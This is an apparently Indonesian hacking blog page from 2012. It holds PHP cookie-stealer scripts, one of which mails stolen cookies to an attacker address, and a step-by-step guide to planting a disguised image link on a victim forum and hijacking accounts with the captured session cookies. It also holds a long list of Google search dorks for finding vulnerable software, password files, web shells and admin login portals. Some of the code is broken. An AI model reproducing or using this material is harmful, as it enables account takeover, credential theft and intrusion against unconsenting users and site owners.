Ingat Waktu Coy

Ingat Waktu Coy _

Senin, 03 September 2012

How to create cookie stealer Coding in PHP?~ get via email

· 1 komentar
Here is the simple Cookie Stealer code:
Cookie stored in File:

$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>

$cookie = $HTTP_GET_VARS["cookie"]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.

$steal = fopen("cookiefile.txt", "a"); This open the cookiefile in append mode so that we can append the stolen cookie.

fwrite($steal, $cookie ."\\n"); This will store the stolen cookie inside the file.

fclose($steal); close the opened file.

Another version: Sends cookies to the hacker mail   

$cookie = $HTTP_GET_VARS["cookie"]; mail("hackerid@mailprovider.com", "Stolen Cookies", $cookie);
?>

The above code will mail the cookies to hacker mail using the PHP() mail function with subject "Stolen cookies".


Third Version

function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown"; 

The above Cookie stealer will store the following information:

  • Ip address
  • port number
  • host(usually computer-name)
  • user agent
  • cookie
 Credit :

»»  READMORE...

Hack Any A/c id by Cookies Stealer Easily

· 0 komentar
Well one of the question which is asked most to me is," How to hack into an email account ",So today i am posting a new way to hack into an email account ,I am not posting this post to exite hackers but to make you aware of whats going around
Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger

Step 1
First you have to create a file which can capture a person's cookie.So follow the following process.

Step 2
 Now you have to change http://www.yoursite.com
to your your site, Remember one thing you should not upload the files into a directory.
Now open notepad and paste the script in it and save it as fun.gif

Step 3
Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
{
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary Server Error,Sorry for the inconvenience.”; fclose($handle); exit; } echo “Temporary Server Error,Sorry for the inconvenience.”; exit; ?>

Step 4:
Create a new Notepad File and Save it as logfile.txt Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
fun.gif ->http://www.yoursite.com/fun.gif
logfile.txt ->http://www.yoursite.com/logfile.txt (chmod 777)
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
www.ofees.net
www.ripway.com
www.t35.com

Step 5
Go to the victim forum and insert this code in the signature or a post :
[url= http://www.yoursite.com /fun.gif][img] http://yoursite.com/ fun.jpg[/img][/url]
So the person who click it will think it is fun.jpg but it redirects to fun.gif

Step 6
So if you click the image you will get a temporary error and you will find the cookie in the logfile.txt

step 7
And something like this will be stored in your "logfile.txt"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 8
To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Now for this you will need a firefox addon named Add and edit cookies
»»  READMORE...

Minggu, 19 Agustus 2012

GOOGLE DORK

· 11 komentar

"1999-2004 FuseTalk Inc" -site:fusetalk.com
"2003 DUware All Rights Reserved"
"2004-2005 ReloadCMS Team."
"2005 SugarCRM Inc. All Rights Reserved" "Powered By SugarCRM"
"Active Webcam Page" inurl:8080
"Based on DoceboLMS 2.0"
"BlackBoard 1.5.1-f | ฉ 2003-4 by Yves Goergen"
"BosDates Calendar System " "powered by BosDates v3.2 by BosDev"
"Calendar programming by AppIdeas.com" filetype:php
"Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved" "Mambo is Free Software
released"
"Copyright 2004 ฉ Digital Scribe v.1.4"
"Copyright ฉ 2002 Agustin Dondo Scripts"
"CosmoShop by Zaunz Publishing" inurl:"cgi-bin/cosmoshop/lshop.cgi"
-V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*
"Cyphor (Release:" -www.cynox.ch
"delete entries" inurl:admin/delete.asp
"driven by: ASP Message Board"
"Enter ip" inurl:"php-ping.php"
"IceWarp Web Mail 5.3.0" "Powered by IceWarp"
"Ideal BB Version: 0.1" -idealbb.com
"index of" intext:fckeditor inurl:fckeditor
"inurl:/site/articles.asp?idcategory="
"Maintained with Subscribe Me 2.044.09p"+"Professional" inurl:"s.pl"
"Mimicboard2 086"+"2000 Nobutaka Makino"+"password"+"message" inurl:page=1
"News generated by Utopia News Pro" | "Powered By: Utopia News Pro"
"Obtenez votre forum Aztek" -site:forum-aztek.com
"Online Store - Powered by ProductCart"
"PhpCollab . Log In" | "NetOffice . Log In" | (intitle:"index.of." intitle:phpcollab|netoffice
inurl:phpcollab|netoffice -gentoo)
"portailphp v1.3" inurl:"index.php?affiche" inurl:"PortailPHP" -site:safari-msi.com
"Powered *: newtelligence" ("dasBlog 1.6"| "dasBlog 1.5"| "dasBlog 1.4"|"dasBlog 1.3")
"powered by 4images"
"Powered by A-CART"
"powered by active php bookmarks" | inurl:bookmarks/view_group.php?id=
"Powered by AJ-Fork v.167"
"Powered by and copyright class-1" 0.24.4
"powered by antiboard"
"Powered by autolinks pro 2.1" inurl:register.php
"Powered by AzDg" (2.1.3 | 2.1.2 | 2.1.1)
"powered by claroline" -demo
"Powered by Coppermine Photo Gallery"
"Powered by Coppermine Photo Gallery" ( "v1.2.2 b" | "v1.2.1" | "v1.2" | "v1.1" | "v1.0")
"powered by CubeCart 2.0"
"Powered by CubeCart"
"Powered by CuteNews"
"Powered by DCP-Portal v5.5"
"Powered by DMXReady Site Chassis Manager" -site:dmxready.com
"Powered by FUDForum 2.6" -site:fudforum.org -johnny.ihackstuff
"Powered by FUDForum 2.7" -site:fudforum.org -johnny.ihackstuff
"Powered by FUDforum"
"powered by Gallery v" "[slideshow]"|"images" inurl:gallery
"Powered by Gallery v1.4.4"
"Powered by GTChat 0.95"+"User Login"+"Remember my login information"
"powered by guestbook script" -ihackstuff -exploit
"powered by GuppY v4"|"Site cr้้ avec GuppY v4"
"Powered by IceWarp Software" inurl:mail
"Powered by Ikonboard 3.1.1"
"powered by ITWorking"
"Powered by Loudblog"
"Powered by MD-Pro" | "made with MD-Pro"
"Powered by Megabook *" inurl:guestbook.cgi
"Powered by MercuryBoard [v1"
"powered by minibb" -site:www.minibb.net -intext:1.7f
"Powered by My Blog" intext:"FuzzyMonkey.org"
"Powered by ocPortal" -demo -ocportal.com
"Powered by PHP Advanced Transfer Manager"
"powered by php icalendar" -ihackstuff -exploit
"powered by php photo album" | inurl:"main.php?cmd=album" -demo2 -pitanje
"powered by PhpBB 2.0.15" -site:phpbb.com
"Powered By phpCOIN 1.2.2"
"powered by phplist" | inurl:"lists/?p=subscribe" | inurl:"lists/index.php?p=subscribe" -ubbi -bugs +phplist
-tincan.co.uk
"Powered by PowerPortal v1.3"
"powered by runcms" -runcms.com -runcms.org
"powered by sblog" +"version 0.7"
"Powered by Simplog"
"powered by sphider" -exploit -ihackstuff -www.cs.ioc.ee
"Powered by UPB" (b 1.0)|(1.0 final)|(Public Beta 1.0b)
"Powered by Woltlab Burning Board" -"2.3.3" -"v2.3.3" -"v2.3.2" -"2.3.2"
"Powered by WordPress" -html filetype:php -demo -wordpress.org -bugtraq
"Powered by WowBB" -site:wowbb.com
"Powered by Xaraya" "Copyright 2005"
"Powered by XHP CMS" -ihackstuff -exploit -xhp.targetit.ro
"Powered by XOOPS 2.2.3 Final"
"Powered by YaPig V0.92b"
"Powered by yappa-ng"
"Powered by Zorum 3.5"
"Powered by: Land Down Under 800" | "Powered by: Land Down Under 801" - www.neocrome.net
"Powered By: lucidCMS 1.0.11"
"running: Nucleus v3.1" -.nucleuscms.org -demo
"Site powered By Limbo CMS"
"Software PBLang" 4.65 filetype:php
"SquirrelMail version 1.4.4" inurl:src ext:php
"Thank You for using WPCeasy"
"This page has been automatically generated by Plesk Server Administrator"
"This script was created by Php-ZeroNet" "Script . Php-ZeroNet"
"This website engine code is copyright" "2005 by Clever Copy" -inurl:demo
"This website powered by PHPX" -demo
"This website was created with phpWebThings 1.4"
"Welcome to the versatileBulletinBoard" | "Powered by versatileBulletinBoard"
"You have not provided a survey identification number" ERROR -xoops.org "please contact"
("powered by nocc" intitle:"NOCC Webmail") -site:sourceforge.net -Zoekinalles.nl -analysis
("Skin Design by Amie of Intense")|("Fanfiction Categories" "Featured Stories")|("default2, 3column,
Romance, eFiction")
("This Dragonfly™ installation was" | "Thanks for downloading Dragonfly") -inurl:demo -inurl:cpgnuke.com
(intitle:"Flyspray setup"|"powered by flyspray 0.9.7") -flyspray.rocks.cc
(intitle:"metaframe XP Login")|(intitle:"metaframe Presentation server Login")
+"Powered by Invision Power Board v2.0.0..2"
+"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl
+intext:"powered by MyBulletinBoard"
Achievo webbased project management
allintitle:aspjar.com guestbook
E-market remote code execution
EarlyImpact Productcart
ext:php intext:"Powered by phpNewMan Version"
ext:pl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input
filetype:cgi inurl:nbmember.cgi
filetype:cgi inurl:pdesk.cgi
filetype:cgi inurl:tseekdir.cgi
filetype:php intitle:"paNews v2.0b4"
filetype:php inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages| viewpage | listcat)
http://www.google.com/search?q=intitle: … 2+intext:%
22%C2%A9+2002-2004+by+Christian+Scheb+-+Stylemotion.de%22%2B%22
intext:"2000-2001 The phpHeaven Team" -sourceforge
intext:"2000-2001 The phpHeaven Team" -sourceforge
intext:"Calendar Program ฉ Copyright 1999 Matt Kruse" "Add an event"
intext:"LinPHA Version" intext:"Have fun"
intext:"PhpGedView Version" intext:"final - index" -inurl:demo
intext:"Powered by CubeCart 3.0.6" intitle:"Powered by CubeCart"
intext:"Powered by DEV web management system" -dev-wms.sourceforge.net -demo
intext:"Powered by flatnuke-2.5.3" +"Get RSS News" -demo
intext:"powered by gcards" -ihackstuff -exploit
intext:"Powered By Geeklog" -geeklog.net
intext:"Powered by phpBB 2.0.13" inurl:"cal_view_month.php"|inurl:"downloads.php"
intext:"Powered by Plogger!" -plogger.org -ihackstuff -exploit
intext:"Powered by SimpleBBS v1.1"*
intext:"Powered By: Snitz Forums 2000 Version 3.4.00..03"
intext:("UBB.threads™ 6.2"|"UBB.threads™ 6.3") intext:"You * not logged *" -site:ubbcentral.com
intitle:"4images - Image Gallery Management System" and intext:"Powered by 4images 1.7.1"
intitle:"b2evo installer" intext:"Installer fr Version"
intitle:"blog torrent upload"
intitle:"EMUMAIL - Login" "Powered by EMU Webmail"
intitle:"HelpDesk" "If you need additional help, please email helpdesk at"
intitle:"igenus webmail login"
intitle:"Looking Glass v20040427" "When verifying an URL check one of those"
intitle:"MRTG/RRD" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)
intitle:"myBloggie 2.1.1..2 - by myWebland"
intitle:"osTicket :: Support Ticket System"
intitle:"PHP TopSites FREE Remote Admin"
intitle:"phpDocumentor web interface"
intitle:"PowerDownload" ("PowerDownload v3.0.2 ฉ" | "PowerDownload v3.0.3 ฉ" )
-site:powerscripts.org
intitle:"View Img" inurl:viewimg.php
intitle:"WebJeff - FileManager" intext:"login" intext:Pass|PAsse
intitle:"WordPress > * > Login form" inurl:"wp-login.php"
intitle:admbook intitle:version filetype:php
intitle:guestbook "advanced guestbook 2.2 powered"
intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook"
intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook"
intitle:Mantis "Welcome to the bugtracker" "0.15 | 0.16 | 0.17 | 0.18"
intitle:PHPOpenChat inurl:"index.php?language="
intitle:welcome.to.horde
inurl:"/cgi-bin/loadpage.cgi?user_id="
inurl:"/login.asp?folder=" "Powered by: i-Gallery 3.3"
inurl:"/site/articles.asp?idcategory="
inurl:"comment.php?serendipity"
inurl:"extras/update.php" intext:mysql.php -display
inurl:"forumdisplay.php" +"Powered by: vBulletin Version 3.0.0..4"
inurl:"messageboard/Forum.asp?"
inurl:"slxweb.dll"
inurl:"wfdownloads/viewcat.php?list="
inurl:*.exe ext:exe inurl:/*cgi*/
inurl:/SiteChassisManager/
inurl:cal_make.pl
inurl:chitchat.php "choose graphic"
inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
inurl:comersus_message.asp
inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php
inurl:database.php | inurl:info_db.php ext:php "Database V2.*" "Burning Board *"
inurl:directorypro.cgi
inurl:docmgr | intitle:"DocMGR" "enter your Username and"|"und Passwort bitte"|"saisir votre nom"|"su
nombre de usuario" -ext:pdf -inurl:"download.php
inurl:gotoURL.asp?url=
inurl:index.php fees shop link.codes merchantAccount
inurl:install.pl intitle:GTchat
inurl:perldiver.cgi ext:cgi
inurl:resetcore.php ext:php
inurl:server.php ext:php intext:"No SQL" -Released
inurl:sphpblog intext:"Powered by Simple PHP Blog 0.4.0"
inurl:sysinfo.cgi ext:cgi
inurl:technote inurl:main.cgi*filename=*
inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk
inurl:ttt-webmaster.php
inurl:wiki/MediaWiki
Invision Power Board SSI.PHP SQL Injection
mnGoSearch vulnerability
phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6
| 0.9.7)
Powered by PHP-Fusion v6.00.109 ฉ 2003-2005. -php-fusion.co.uk
powered.by.instaBoard.version.1.3
Powered.by:.vBulletin.Version ...3.0.6
Quicksite demopages for Typo3
ReMOSitory module for Mambo
uploadpics.php?did= -forumintext:Generated.by.phpix.1.0? inurl:$mode=album
vBulletin version 3.0.1 newreply.php XSS
VP-ASP Shopping Cart XSS
WEBalbum 2004-2006 duda -ihackstuff -exploit
WebAPP directory traversal
============================
Error Massages :

"A syntax error has occurred" filetype:ihtml
"access denied for user" "using password"
"An illegal character has been found in the statement" -"previous message"
"ASP.NET_SessionId" "data source="
"Can't connect to local" intitle:warning
"Chatologica MetaSearch" "stack tracking"
"detected an internal error [IBM][CLI Driver][DB2/6000]"
"error found handling the request" cocoon filetype:xml
"Fatal error: Call to undefined function" -reply -the -next
"Incorrect syntax near"
"Incorrect syntax near"
"Internal Server Error" "server at"
"Invision Power Board Database Error"
"ORA-00933: SQL command not properly ended"
"ORA-12541: TNS:no listener" intitle:"error occurred"
"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php
"PostgreSQL query failed: ERROR: parser: parse error"
"Supplied argument is not a valid MySQL result resource"
"Syntax error in query expression " -the
"The script whose uid is " "is not allowed to access"
"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."
"Unable to jump to row" "on MySQL result index" "on line"
"Unclosed quotation mark before the character string"
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
"Warning: Cannot modify header information - headers already sent"
"Warning: Division by zero in" "on line" -forum
"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
"Warning: mysql_query()" "invalid query"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
"Warning: Supplied argument is not a valid File-Handle resource in"
"Warning:" "failed to open stream: HTTP request failed" "on line"
"Warning:" "SAFE MODE Restriction in effect." "The script whose uid is" "is not allowed to access owned by uid 0 in" "on line"
"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
An unexpected token "END-OF-STATEMENT" was found
Coldfusion Error Pages
filetype:asp + "[ODBC SQL"
filetype:asp "Custom Error Message" Category Source
filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
filetype:php inurl:"logging.php" "Discuz" error
ht://Dig htsearch error
IIS 4.0 error messages
IIS web server error messages
Internal Server Error
intext:"Error Message : Error loading required libraries."
intext:"Warning: Failed opening" "on line" "include_path"
intitle:"Apache Tomcat" "Error Report"
intitle:"Default PLESK Page"
intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm
intitle:"Error Occurred" "The error occurred in" filetype:cfm
intitle:"Error using Hypernews" "Server Software"
intitle:"Execution of this script not permitted"
intitle:"Under construction" "does not currently have"
intitle:Configuration.File inurl:softcart.exe
MYSQL error message: supplied argument....
mysql error with query
Netscape Application Server Error page
ORA-00921: unexpected end of SQL command
ORA-00921: unexpected end of SQL command
ORA-00936: missing expression
PHP application warnings failing "include_path"
sitebuildercontent
sitebuilderfiles
sitebuilderpictures
Snitz! forums db path error
SQL syntax error
Supplied argument is not a valid PostgreSQL result
warning "error on line" php sablotron
Windows 2000 web server error messages
===========================
Files Containing Password :

"admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
"powered by ducalendar" -site:duware.com
"Powered by Duclassified" -site:duware.com
"Powered by Duclassified" -site:duware.com "DUware All Rights reserved"
"powered by duclassmate" -site:duware.com
"Powered by Dudirectory" -site:duware.com
"powered by dudownload" -site:duware.com
"Powered By Elite Forum Version *.*"
"Powered by Link Department"
"sets mode: +k"
"your password is" filetype:log
"Powered by DUpaypal" -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration" -intext:the
etc (index.of)
ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn
ext:inc "pwd=" "UID="
ext:ini eudora.ini
ext:ini Version=4.0.0.4 password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:cfg mrtg "target[*]" -sample -cvs -example
filetype:cfm "cfapplication name" password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password.log"
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext:”WINVNC3”
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql ("passwd values" | "password values" | "pass values" )
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"powered by EZGuestbook"
intext:"powered by Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default_password" +"Zend Scripting Language Engine"
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:rapidshare intext:login
inurl:"calendarscript/users.txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"Sites.dat"+"PASS="
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified
brada.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
============================
Files Containing User Name :

"index of" / lck
+intext:"webalizer" +intext:"Total Usernames" +intext:"Usage Statistics for"
bash_history files
filetype:conf inurl:proftpd.conf -sample
filetype:log username putty
filetype:reg reg +intext:"internet account manager"
filetype:reg reg HKEY_CURRENT_USER username
index.of perform.ini
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
inurl:admin filetype:asp inurl:userlist
inurl:admin inurl:userlist
inurl:php inurl:hlstats intext:"Server Username"
OWA Public folders & Address book
sh_history files
============================
Footholds:

"adding new user" inurl:addnewuser -"there are no domains"
"index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )
"Please re-enter your password It must match exactly"
(intitle:"SHOUTcast Administrator")|(intext:"U SHOUTcast D.N.A.S. Status")
(intitle:"WordPress › Setup Configuration File")|(inurl:"setup-config.php?step=")
(inurl:81/cgi-bin/.cobalt/) | (intext:"Welcome to the Cobalt RaQ")
+htpasswd +WS_FTP.LOG filetype:log
filetype:php HAXPLORER "Server Files Browser"
intitle:"ERROR: The requested URL could not be retrieved" "While trying to retrieve the URL" "The following error was encountered:"
intitle:"net2ftp" "powered by net2ftp" inurl:ftp OR intext:login OR inurl:login
intitle:"Web Data Administrator - Login"
intitle:"YALA: Yet Another LDAP Administrator"
intitle:admin intitle:login
intitle:MyShell 1.1.0 build 20010923
inurl:"phpOracleAdmin/php" -download -cvs
inurl:"tmtrack.dll?"
inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx
inurl:polly/CP
PHP Shell (unprotected)
PHPKonsole PHPShell filetype:php -echo
Public PHP FileManagers
===============================
File Containing Login Portals :

intitle:"remote assessment" OpenAanval Console
intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"
"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com
"Emergisoft web applications are a part of our"
"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-
"HostingAccelerator" intitle:"login" +"Username" -"news" -demo
"iCONECT 4.1 :: Login"
"IMail Server Web Messaging" intitle:login
"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com
"intitle:3300 Integrated Communications Platform" inurl:main.htm
"Login - Sun Cobalt RaQ"
"login prompt" inurl:GM.cgi
"Login to Usermin" inurl:20000
"Microsoft CRM : Unsupported Browser Version"
"OPENSRS Domain Management" inurl:manage.cgi
"pcANYWHERE EXPRESS Java Client"
"Please authenticate yourself to get access to the management interface"
"please log in"
"Please login with admin pass" -"leak" -sourceforge
"powered by CuteNews" "2003..2005 CutePHP"
"Powered by DWMail" password intitle:dwmail
"Powered by Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com
"Powered by Midmart Messageboard" "Administrator Login"
"Powered by Monster Top List" MTL numrange:200-
"Powered by UebiMiau" -site:sourceforge.net
"site info for" "Enter Admin Password"
"SquirrelMail version" "By the SquirrelMail Development Team"
"SysCP - login"
"This is a restricted Access Server" "Javascript Not Enabled!"|"Messenger Express" -edu -ac
"This section is for Administrators only. If you are an administrator then please"
"ttawlogin.cgi/?action="
"VHCS Pro ver" -demo
"VNC Desktop" inurl:5800
"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com
"WebExplorer Server - Login" "Welcome to WebExplorer Server"
"WebSTAR Mail - Please Log In"
"You have requested access to a restricted area of our website. Please authenticate yourself to continue."
"You have requested to access the management functions" -.edu
(intitle:"Please login - Forums powered by UBB.threads")|(inurl:login.php "ubb")
(intitle:"Please login - Forums powered by WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")
(intitle:"rymo Login")|(intext:"Welcome to rymo") -family
(intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")
(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil
4images Administration Control Panel
allintitle:"Welcome to the Cyclades"
allinurl:"exchange/logon.asp"
allinurl:wps/portal/ login
ASP.login_aspx "ASP.NET_SessionId"
CGI:IRC Login
ext:cgi intitle:"control panel" "enter your owner password to continue!"
ez Publish administration
filetype:php inurl:"webeditor.php"
filetype:pl "Download: SuSE Linux Openexchange Server CA"
filetype:r2w r2w
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your domain."
intext:"brada Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"brada Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp
intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration" "Copyright"
intitle:"AlternC Desktop"
intitle:"Athens Authentication Point"
intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Dell Remote Access Controller"
intitle:"Docutek ERes - Admin Login" -edu
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login - powered by Easy File Sharing Web Server"
intitle:"Login Forum Powered By AnyBoard" intitle:"If you are a new user:" intext:"Forum Powered By AnyBoard" inurl:gochat -edu
intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi
intitle:"Merak Mail Server Web Administration" -ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service and a language."
intitle:"oMail-admin Administration - Login" -inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -script -site:freelists.org
intitle:"PHP Advanced Transfer" inurl:"login.php"
